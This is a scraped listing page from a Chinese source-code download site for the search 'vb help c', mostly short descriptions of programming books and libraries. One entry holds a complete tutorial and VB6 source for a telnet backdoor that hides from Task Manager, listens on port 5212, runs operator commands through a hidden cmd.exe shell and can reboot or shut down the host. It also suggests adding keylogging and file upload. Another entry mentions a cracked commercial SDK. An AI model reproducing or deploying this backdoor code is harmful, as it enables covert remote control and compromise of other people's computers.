Welcome![Sign In][Sign Up]
Location:
Search - vb help c

Search list

[Other resourceManning.C.plus.plus.CLI.in.Action.Apr.2007.pdf

Description: C++/CLI in Action is a practical guide that will help you breathe new life into your legacy C++ programs. The book begins with a concise C++/CLI tutorial. It then quickly moves to the key themes of native/managed code interop and mixed-mode programming. You抣l learn to take advantage of GUI frameworks like Windows Forms and WPF while keeping your native C++ business logic. The book also covers methods for accessing C# or VB.NET components and libraries. Written for readers with a working knowledge of C++.
Platform: | Size: 18717830 | Author: daniel | Hits:

[Network DevelopVB Telnet编程指导思路

Description:

vB编程之TELNET
对于TELNET后门的编写我们可通过VC来编写,网上也有很多的关于用VC编写TELNET后门的源码。但是看X档案的一定不少是喜欢VB来编写程序的。纵然编写TELNET后门不是VB的长项,但这不并难实现。偶没见网上有用VB编写TELNET后门的文章,所以我就写下了此文,确切的说,
这不是个真正后门,只是一个后门的基本模型,甚至可以说毛坯。BUG的修改,不足的修补,功能的扩充还需读者动手来实现。
首先,我们在大脑里想象出一个后门运行的过程或者把其大概的流程画出来,然后就按这个过程逐步来实现。好了,
下面就开始我们的后门编写之路。首先就是当程序运行时防止再一个程序的运行,实现代码如下:
Private Sub Form_Load()
syspath = systempath()
'防止多个程序运行
If App.PrevInstance Then
End
End If
cmdno = True
'使程序不在任务管理器中显示
App.TaskVisible = False
'监听端口5212
Winsock1.LocalPort = 5212
Winsock1.Listen
End Sub
其次,当telnet端请求连接时,服务端接受请求。(大家可以在此试着实现密码验证机制的实现,很简单,在此不再给出代码)
当TELNET连接时,触发ConnectionRequest事件,在这个事件中向控制端发送相应的成功连接和帮助信息。
Private Sub Winsock1_ConnectionRequest(ByVal requestID As Long)
If Winsock1.State <> sckClosed Then
Winsock1.Close
Winsock1.Accept requestID
Winsock1.SendData "------------------------backdoor v1.0-------------------------" & vbCrLf & _
Space(16) & "code by eighteen" & vbCrLf & "-------------------------------------------------------------" & _
vbCrLf & "type help to get help" & vbCrLf & "shell>"
End If
End Sub
当我们连接上时,就需要对TELNET发来的命令进行一系列的处理和执行,以及执行相关的控制功能。
其中的问题是服务端接受来自TELNET客户端的连接和命令,由于TELNET传输命令时只能每间次传输一个字符的特殊性,
所以我们需要编写一个处理命令的过程,这个不难实现。还有就是对特殊字符的过滤和处理,如TELNET输入错误按DEL键,
按ENTER键来完成一条命令的输入。当TELNET连上服务端时,实现shell功能,以及shell功能和其它功能的分离。
对其中的问题有了大概的了解,那实现起来也就不难了。代码如下:
Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long)
Dim str1 As String
Dim scmd As String
Dim i As Integer
Dim tag As Integer
Winsock1.GetData str1
'过滤del键盘,用来telnet命令输入错误处理.如果输入del键盘,则当前命令无效
If Asc(str1) = 8 Then
myname = "" '清空命令存储
Winsock1.SendData vbCrLf & "shell>"
End If
'检察当前一个命令的完整性和对命令输入错误的处理
If (Asc(str1) <> 13) And (Asc(str1) <> 8) Then
myname = myname + str1
Elseif Asc(str1) <> 8 Then
'测试时,查看接受的命令
Text1.Text = myname & vbcrlf
myname = "" '清空对当前命令的存储,用来接受下一条命令
'--------下面是对接受命令的处理
tag = InStr(Text1.Text, Chr(13)) - 1
scmd = Left(Text1.Text, tag)
'------------------------------
'判断是不是在虚拟shell中,不是则执行如下命令,否则执行虚拟shell命令语句
If cmdno = True Then
Select Case scmd
Case "help"
Winsock1.SendData "cmd     -------打开shell" & vbCrLf & "reboot     -------重启" & _
vbCrLf & "shutdown   ------- 关机" & vbCrLf & "exit     -------退出" & vbCrLf & "shell>"

Case "reboot"
ExitWindowsEx EXW_REBOOT, 0

Case "shutdown"
ExitWindowsEx EXW_SHUTDOWN, 0
Case "exit"
Winsock1.SendData "exit seccessful!"
Winsock1.Close
Winsock1.Listen
Case "cmd"
Winsock1.SendData "获得虚拟shell成功!" & vbCrLf & "vcmd>"
cmdno = False
Case Else
Winsock1.SendData "cammond error!" & vbCrLf & "shell>"
End Select
Else
Shell "cmd.exe /c" & Space(1) & scmd & Space(1) & ">" & syspath & "\shell.rlt&exit", vbHide
Sleep (500)
'调用执行结果发送过程
Call tranrlt
Winsock1.SendData "如果想退出虚拟shell,清输入exit" & vbCrLf & "vcmd>"
If scmd = "exit" Then
Winsock1.SendData "成功退出虚拟shell!" & vbCrLf & "shell>"
cmdno = True '重置虚拟shell标志
End If
End If
End If
End Sub
接下来要考滤的是,虚拟shell的实现,我用了一个简单的方法,就是把命令执行结果写入一个文本文档,然后读取其中的内
容并将结果发送给控制端。代码如下:
Sub tranrlt()
Dim strrlt As String
Open syspath & "\shell.rlt" For Input As #1
Do While Not EOF(1)
Line Input #1, strrlt
Winsock1.SendData strrlt & vbCrLf
Loop
Close #1
Winsock1.SendData "----------------------------------------------------" & vbCrLf
Shell "cmd.exe /c del " & syspath & "\shell.rlt&exit", vbHide
End Sub
至此,后门的主要问题都解决了,也许有的读者可以看出,这个后门模型存在问题。的确,这个后门模型并不完整,
所谓学而三思,思而后行,剩下的问题读者可以试着去解决。在此我不在给出源码。提示一下:
(1)如果TELNET不正常退出,服务端还会继续保存当前的会话,重新连接后失败。还有就是如何可以允许多人同时连接功能。
(2)读者可以加上密码验证机制,在此基础上扩大它的控制功能,如键盘记录,文件上传等。
(3)一个成功的后门,必然有一个好的隐藏和自我保护机制,所以,大家需要努力发挥自己的聪明和才智了。
以上只是个人愚见,不难实现。其实程序编写只有深入其中,动手实践,才会发现各种问题,而正是在这发现问题,解决问题的过程中,
你会学到更多,成功后的满足也更多。当我们苦苦思索解决一个问题或实现一种新方法和功能时,那种豁然开朗,
成功的喜悦会让你体会编程的乐趣。希望大家看完本文和在动手来完善它的时候,能学到些知识和技巧,那本文的目的也就达到了。

_____________--源码
Public syspath As String
Public cmdno As Boolean
Private Declare Sub Sleep Lib "kernel32" (ByVal nsecond As Long)
Private Declare Function ExitWindowsEx Lib "user32" (ByVal uFlags As Long, ByVal dwReserved As Long) As Long
Private Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Const EWX_REBOOT = 2
Const EWX_SHUTDOW = 1
Public myname As String
Sub tranrlt()
Dim strrlt As String
Open syspath & "\shell.rlt" For Input As #1
Do While Not EOF(1)
Line Input #1, strrlt
Winsock1.SendData strrlt & vbCrLf
Loop
Close #1
Winsock1.SendData "----------------------------------------------------" & vbCrLf
Shell "cmd.exe /c del " & syspath & "\shell.rlt&exit", vbHide
End Sub
Function systempath() As String
Dim filepath As String
Dim nSize As Long
filepath = String(255, 0)
nSize = GetSystemDirectory(filepath, 256)
filepath = Left(filepath, nSize)
systempath = filepath
End Function
Private Sub Form_Load()
syspath = systempath()
If App.PrevInstance Then
End
End If
cmdno = True
App.TaskVisible = False
Winsock1.LocalPort = 5212
Winsock1.Listen
End Sub
Private Sub Winsock1_ConnectionRequest(ByVal requestID As Long)
If Winsock1.State <> sckClosed Then
Winsock1.Close
Winsock1.Accept requestID
Winsock1.SendData "------------------------backdoor v1.0-------------------------" & vbCrLf & _
Space(16) & "code by eighteen" & vbCrLf & "-------------------------------------------------------------" & _
vbCrLf & "type help to get help" & vbCrLf & "shell>"
End If
End Sub

Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long)
Dim str1 As String
Dim scmd As String
Dim i As Integer
Dim tag As Integer
Winsock1.GetData str1
If Asc(str1) = 8 Then
myname = ""
Winsock1.SendData vbCrLf & "command error!" & vbCrLf & "shell>"
End If
If (Asc(str1) <> 13) And (Asc(str1) <> 8) Then
myname = myname + str1
ElseIf Asc(str1) <> 8 Then
Text1.Text = myname & vbCrLf
myname = ""
tag = InStr(Text1.Text, Chr(13)) - 1
scmd = Left(Text1.Text, tag)
If cmdno = True Then
Select Case scmd
Case "help"
Winsock1.SendData "cmd     -------打开shell" & vbCrLf & "reboot     -------重启" & _
vbCrLf & "shutdown   ------- 关机" & vbCrLf & "exit     -------退出" & vbCrLf & "shell>"

Case "reboot"
ExitWindowsEx EXW_REBOOT, 0

Case "shutdown"
ExitWindowsEx EXW_SHUTDOWN, 0
Case "exit"
Winsock1.SendData "exit seccessful!"
Winsock1.Close
Winsock1.Listen
Case "cmd"
Winsock1.SendData "获得虚拟shell成功!" & vbCrLf & "vcmd>"
cmdno = False
Case Else
Winsock1.SendData "command error!" & vbCrLf & "shell>"
End Select
Else
Shell "cmd.exe /c" & Space(1) & scmd & Space(1) & ">" & syspath & "\shell.rlt&exit", vbHide
Sleep (500)
Call tranrlt

Winsock1.SendData "如果想退出虚拟shell,清输入exit" & vbCrLf & "vcmd>"
If scmd = "exit" Then
Winsock1.SendData "成功退出虚拟shell!" & vbCrLf & "shell>"
cmdno = True
End If
End If
End If
End Sub

Private Sub Winsock1_Error(ByVal Number As Integer, Description As String, ByVal Scode As Long, ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext As Long, CancelDisplay As Boolean)
Winsock1.Close
Winsock1.Listen
End Sub


Platform: | Size: 8205 | Author: onetwogoo | Hits:

[Web ServermyTopWinCMS2

Description: 拓文asp.net网站内容管理系统 v2.0 v2.0重写了数据访问层,大量修改了逻辑层。新加入软件下载模块,简化生成HTML得步骤,提升生成HTML得性能,搜索引擎加入多关键字搜索功能. 一个开放源码的.net系统,基于三层结构开发;具有VB.NET和C#.NET双版版本.数据库采用SQl Server 2000,使用了大量存储过程,并非单纯的把数据库形式由ACCESS转为MSSQL的程序。 它拥有众多模块:软件下载,新闻文章,留言本,调查投票,友情链接,在线文件管理,公告发布,数据库管理。界面豪华、功能完善、简单易用、管理方便。它能帮助您建立高效率的独立站点。 它支持无限分类、栏目自由排序、批量生成静态文件、支持长文章分页...文章点击统计为动态,省去了隔段时间生成HTML的麻烦;强大的在线编辑文章功能提供了最大的灵活性,却又无需要专门学习,可方便地行图文混排,任意修改。 留言本支持UBB代码、支持关键字过滤、支持禁止指定IP发留言、防灌水机攻击机制、支持阻止广告程序自动灌水。 管理员权限采用基于角色的分配,特别合适多人员维护网站。 -Tuong Van Asp. Net Web content management system v2.0 v2.0 rewrite of the data access layer, extensive amendments to the logical layer. New software download module, generating HTML in simplified steps to enhance performance in generating HTML, Search engines add more keyword search function. an open source. net system, based on the three-tier structure development; with VB.NET, and C#.NET-edition version. the database using SQL Server 2000. he used a lot of storage process is not simply a form from the database ACCESS to MSSQL procedures. It has many modules : download software, news articles, message of the survey vote Links, online document management, announcement, database management. Interface luxury, complete functions, easy to use and easy to manage. It can help you build an effi
Platform: | Size: 5703680 | Author: 可可 | Hits:

[Editorvb.com

Description: vb的一些小程序,有动态装入菜单,动态图片按纽,调用office.相信可以为初学着以帮助-vb some small procedures, dynamic load menu, Dynamic Photo button, Call office. believe can help to a novice
Platform: | Size: 3218432 | Author: yanjia | Hits:

[Delphi VCLFastDown1.1

Description: 软件主页: www.gfastdown.com 文件说明: FastDownActiveX.zip ActiveX版 FastDownCB6.zip C++ Builder6 静态库 FastDownVC6.zip VC++ 6 静态库 FastDownVC7.zip VC++ 7 静态库 TestFastDown.zip 测试程序 TestFastDownSrcVC6.zip 测试程序源代码(VC版) TestFastDownSrcVB6.zip 测试程序源代码(VB版) FastDownHelp.zip 帮助文档 特点: 支持HTTP、FTP协议,支持HTTP CHUNKED编码,支持HTTP GET、POST方法,支持重定向、Cookie。 支持获取FTP目录内容。 支持断点续传,支持将文件分成多块同时下载,可任意指定分块数,下载速度快,CPU占用率低。 支持从多个地址下载同一个文件。 支持同步模式,异步模式。 支持SOCKS4,SOCKS5,HTTP1.1代理。 可提供C++静态库(VC6、VC7、VC8、C++ Builder),可提供ActiveX版本(支持C++ Builder、Delphi、VB、VC++、C#、VB.net、Delphi.net)。 全部代码不依赖于MFC,不依赖于WININET库,方便移植。 接口简单,灵活。 支持Win98,WinMe,Win2000, Windows XP,Windows 2003-software Home : www.gfastdown.com documents : FastDownActiveX.zip ActiveX version FastDownCB6.z ip C Builder6 static FastDownVC6.zip VC six static FastD ownVC7.zip VC 7 TestFastDown.zip the static test procedure Test FastDownSrcVC6.zip testing program source code (VC version) TestFastDo wnSrcVB6.zip testing program source code (VB Edition) FastDownHelp.zip help documentation features : support for HTTP, FTP, HTTP support CHUNKED coding, supports HTTP GET, POST, the support redirect, Cookie. Support FTP access to directory content. Supports HTTP, support the file into several pieces, while downloading can be arbitrarily designated a few blocks, download speed, CPU utilization rate is low. Support downloaded from the same number of addresses in a document. Synchronous, asynchronous mode. Sup
Platform: | Size: 3208192 | Author: zxq | Hits:

[SCM6502_asm_command_study

Description: 在网上搜集的一些关于6502的资料,在win2000下调试通过了,有vb也有vc的程序,还有一些6502基础命令学习,对想学6502汇编的有一定的帮助,如何使用,详细看里面有说明文件:)-the Internet to collect some information on 6502, under the WIN2000 debugging passed, vb have a vc procedures, there are some 6502 orders based learning, right, like the 6502 compilation of help to a certain extent, how to use, with a detailed look at documentation :)
Platform: | Size: 2881536 | Author: name | Hits:

[Software EngineeringVBhelp

Description: VB精华文摘(CHM版),为了减小空间,上传个chm-VB essence Digest (CHM version), in order to reduce the space, uploads a chm
Platform: | Size: 707584 | Author: siweilinux | Hits:

[VC/MFCManning.C.plus.plus.CLI.in.Action.Apr.2007.pdf

Description: C++/CLI in Action is a practical guide that will help you breathe new life into your legacy C++ programs. The book begins with a concise C++/CLI tutorial. It then quickly moves to the key themes of native/managed code interop and mixed-mode programming. You抣l learn to take advantage of GUI frameworks like Windows Forms and WPF while keeping your native C++ business logic. The book also covers methods for accessing C# or VB.NET components and libraries. Written for readers with a working knowledge of C++.-C++/CLI in Action is a practical guide that will help you breathe new life into your legacy C++ Programs. The book begins with a concise C++/CLI tutorial. It then quickly moves to the key themes of native/managed code interop and mixed-mode programming. You ll l learn to take advantage of GUI frameworks like Windows Forms and WPF while keeping your native C++ business logic. The book also covers methods for accessing C# or VB. NET components and libraries. Written for readers with a working knowledge of C++.
Platform: | Size: 18717696 | Author: daniel | Hits:

[OtherArcSDE

Description: ArcSDE Developer Help,英文版。基于arcGIS地理空间数据引擎的二次开发文档。包含C,JAVA,VB等环境。
Platform: | Size: 12325888 | Author: huayunzi | Hits:

[Othervba

Description: VBA帮助手册,VBA函数说明 ,VBA For Word 2000.CHM-VBA help manual, VBA function description, VBA For Word 2000.CHM
Platform: | Size: 2212864 | Author: rrf1122 | Hits:

[JSP/Javacode

Description: 库存管理子系统帮助企业的仓库管理人员对库存物品的入库,出库,移动,盘点,补充订货和生产补料等操作进行全面的控制和管理,以达到降低库存,减少资金占用,避免物料积压或短缺现象,保证生产经营活动顺利进行的目的。库存管理子系统是一个多层次的管理系统,可以通过灵活的设置实现不同层次的管理。采用Java+SQL Server开发的,为C/S架构系统,本文主要介绍本系统的设计和开发过程。-Inventory management subsystem to help enterprise storage management on inventory storage, a library, mobile, inventory, ordering and production of supplementary feeding and other operations to conduct a comprehensive control and management so as to minimize inventory, reduce the capital occupied, to avoid material backlog or shortage of production and operation activities to ensure the smooth conduct of purpose. Inventory management sub-system is a multi-level management system that can realize through a flexible set of management at different levels. Used Java+ SQL Server development for C/S-based systems, this paper introduces the system design and development process.
Platform: | Size: 97280 | Author: 何培 | Hits:

[Finance-Stock software systemATM_get_money

Description: 模拟银行ATM提款机系统(单线程),我的RAD项目,得到了刘岩博士的大力支持,目前完成了单线程的程序结构,开发平台VC6.0,运行平台DOS7.0。程序是C/S结构,由服务端和客户端程序构成,还有一个配置程序来定义文件和IP,程序还实现了冲帐功能。我还在思考如何设计多线程的设计,特公布了原码,望大家帮我看看。-Simulation of ATM bank teller machine system (single-threaded), my RAD project has been the strong support of Dr. Liu Yan, the current procedures for the completion of the single-threaded structure, and development platform VC6.0, running platform DOS7.0. Process is C/S structure, by the service client and the client program consists of a procedure to define the configuration files and IP, the procedures also realize the strike a balance function. I am still thinking how to design multi-threaded design, special publication of the original code, hope to see everyone help me.
Platform: | Size: 10240 | Author: 做自己的偶像 | Hits:

[Finance-Stock software systemATM

Description: 模拟银行ATM提款机系统 模拟银行ATM提款机系统(单线程),我的RAD项目,得到了刘岩博士的大力支持,目前完成了单线程的程序结构,开发平台VC6.0,运行平台DOS7.0。程序是C/S结构,由服务端和客户端程序构成,还有一个配置程序来定义文件和IP,程序还实现了冲帐功能。我还在思考如何设计多线程的设计,特公布了原码,望大家帮我看看。 转载请注明来源: 开源盛世-源代码下载网 www.vscodes.com-Simulation of ATM bank teller machine system simulation bank ATM cash dispenser system (single-threaded), my RAD project has been the strong support of Dr. Liu Yan, the current procedures for the completion of the single-threaded structure, and development platform VC6.0, running platform DOS7.0. Process is C/S structure, by the service client and the client program consists of a procedure to define the configuration files and IP, the procedures also realize the strike a balance function. I am still thinking how to design multi-threaded design, special publication of the original code, hope to see everyone help me. Reprint please specify Source: Open Source Spirit- the source code to download network www.vscodes.com
Platform: | Size: 12288 | Author: 刘东明 | Hits:

[Windows Developcrc

Description: CRC校验程序包,包含VB,C,汇编下,实现CRC校验程序的代码,详细介绍CRC校验的原理,介绍 查表法,半字节查表法,等等实现CRC校验的方法,希望对大家有所帮组。-CRC Checksum package, including VB, C, compilation achieve CRC checksum code, detailing the principles of CRC checksum on look-up table method, semi-byte look-up table method, and so on to achieve CRC checksum method I hope all of you to help group.
Platform: | Size: 34816 | Author: 庄少轩 | Hits:

[GDI-Bitmapscrnsave_code

Description: 这是一个在windows平台下运行的类似于win98的屏幕保护程序“变幻线”的东东,不过屏蔽掉了Alt+Ctrl+Del,Alt+Tab键,运行时全屏,只能用特定的密码退出,密码是:kkcocoon.呵呵,记住了,不然,可能要逼得你重新启动机器。   本程序对于每一个windows下编程的程序员(比如正在使用VC,VB,Delphi,C++Builder等的朋友)来说,相信都会是一个很有价值的示例程序。因为本程序没有使用MFC,VCL等类库,用Windows SDK(Windows Software Development kit,即windows软件开发工具包)编写,可以说是在Windows下编程的最低层,也是windows程序的标准编写方式。相信本程序对理解在windows下编程的一般结构和思想有所帮助。   本程序用C语言编写,在Visual C++6.0下编译调试,在代码文件中有详细的注释,几乎是一行程序一行注释。具体问题可以看源程序的Readme.txt,其他问题可发邮件给我。-This is a platform for running under windows similar to the screen saver win98 "change line" Dongdong, but masked the Alt+ Ctrl+ Del, Alt+ Tab keys, run-time full-screen, only with a specific password exit, the password is: kkcocoon. Oh, remember, otherwise you may be forced to restart the machine. This procedure for each program under windows programmers (such as is the use of VC, VB, Delphi, C++ Builder and other friends), the trust will be a valuable example of the procedure. Since this procedure does not use MFC, VCL class library, etc., using Windows SDK (Windows Software Development kit, that is, windows software development kit) to prepare, it can be said that under Windows at the lowest level programming as well as standard windows procedure to prepare the way. Believe that the process of understanding at windows programming under the general structure and ideas help. This procedure using C language, in the Visual C++6.0 under the compiler debugging, in the code file
Platform: | Size: 17408 | Author: kk.h | Hits:

[.netNet_Chinese_Documents

Description: 此文档是.NET的中文文档其中包含了 ASP.NET ADO.NET VB.NET C# XML 等讲解 希望对大家有帮助 -This document is. NET Chinese document which contains ASP.NET ADO.NET VB.NET C# XML, etc. We want to help to explain
Platform: | Size: 14661632 | Author: 阿斯兰 | Hits:

[Windows DevelopwinIO

Description: 利用WinIo实现并口或I/O的通讯,以及Winio的源码,C、VB实现的例子,帮助文档。-WinIo achieved using parallel or I/O, communications, as well as Winio source, C, VB implementation examples, help documentation.
Platform: | Size: 125952 | Author: bingyihan | Hits:

[CSharpIllustrated_Csharp_2008_chinese

Description: 《C#图解教程》是一本广受赞誉的C#教程。它以图文并茂的形式,用朴实简洁的文字,并辅之以大量表格和代码示例,精炼而全面地阐述了最新版C#语言的各种特性,使读者能够快速理解、学习和使用C#。同时,《C#图解教程》还讲解了C#与VB、C++等主流语言的不同点和相似之处。 作者简介   DanielSolis 资深软件工程师和技术顾问.有20余年开发经验,曾为微软和IBM等大公司提供技术咨询。他拥有加州大学计算机科学硕士、生物学和英文学士学位。同时,他也是一位杰出的导师。在美国和欧洲从事编程语言、Wirldows程序设计和Unix底层技术相关的教学培训工作多年。-The unique, visual format of Illustrated C# 2008 has been specially created by author, and teacher of development methods, Daniel Solis. The concise text, use of tables to clarify language features, frequent figures and diagrams, as well as focused code samples all combine to create a unique approach that will help you understand and get to work with C# fast.
Platform: | Size: 43388928 | Author: dozenow | Hits:

[GIS programMapX

Description: Mapx二次开发必备电子格式帮助信息,内含用VB及C++开发的实例!-Mapx secondary development must help information in electronic format, containing with the development of VB and C++ examples!
Platform: | Size: 509952 | Author: liang | Hits:

[Multimedia DevelopTVideoGrabber

Description: TVideoGrabber 是一款通用的视频捕捉和媒体播放组件,可用于 C#、VB、C++、Delphi、C++Builder 和 ActiveX-compatible 开发工具。软件功能强大,使用简单,可捕获来自 Firewire (IEEE1394)、DV摄像机、USB摄像头、电视卡、视频播放设备等的视频和音频信号,并保存为 AVI、ASF、WAV、MP3、MPEG2等格式文件。同时带有DV机控制,电视卡转台功能。 在录制视频的基础上,更可实现视频拼接、分割和格式转换功能。 软件内置播放器,可直接播放录制完成的多媒体文件,并提供基本的播放控制。 经测试,该版本没有功能限制。 - TVideoGrabber Video SDK version : v8.2 build 8.2.1.7 date : February 9, 2010 status : Cracked by DarkRapt0r system req. : Windows 7/Vista/XP/MCE/2003 server/2000/ME/98 DirectX runtime 9.0c or higher home page : http://www.datastead.com alt. home page : http://www.delphicity.com contact : contact@datastead.com support : support@datastead.com purchase : http://www.datastead.com/vidgrab/order.htm INSTALL : Read the "intall.txt" located in the folder of this package corresponding to the development tool used. ------- HELP : the help files are located in the "Help" folder of this package. ---- - use "TVideoGrabber.chm" on all platforms, including Windows 7 and Windows Vista - use "VidGrab.hlp" on earlier platforms (the content is the same)
Platform: | Size: 27890688 | Author: guanjunduan | Hits:
« 12 3 »

CodeBus www.codebus.net